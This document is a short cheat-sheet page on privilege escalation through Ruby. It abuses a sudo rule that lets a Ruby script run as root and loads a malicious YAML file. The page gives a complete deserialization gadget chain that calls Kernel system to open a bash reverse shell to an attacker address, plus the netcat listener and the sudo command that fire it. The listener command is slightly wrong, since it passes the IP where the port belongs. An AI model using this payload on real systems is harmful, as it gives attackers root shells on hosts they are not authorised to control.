# Ruby Privilege Escalation

Ruby is an interpreted, high-level, general-purpose programming language.

### Remote Code Execution with YAML <a href="#remote-code-execution-with-yaml" id="remote-code-execution-with-yaml"></a>

Check if the current user could run the ruby script as root privilege.

```
(root) NOPASSWD: /usr/bin/ruby sample.rb
```

If the sample.rb contains the “File.read(’sample.yml’)”, modify the YAML file as follow:

```shellscript
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
         method_id: :resolve
```

Then start listener in local machine.

```
nc -lvnp <local-ip>
```

Now run the sudo command.

```
sudo /usr/bin/ruby sample.rb
```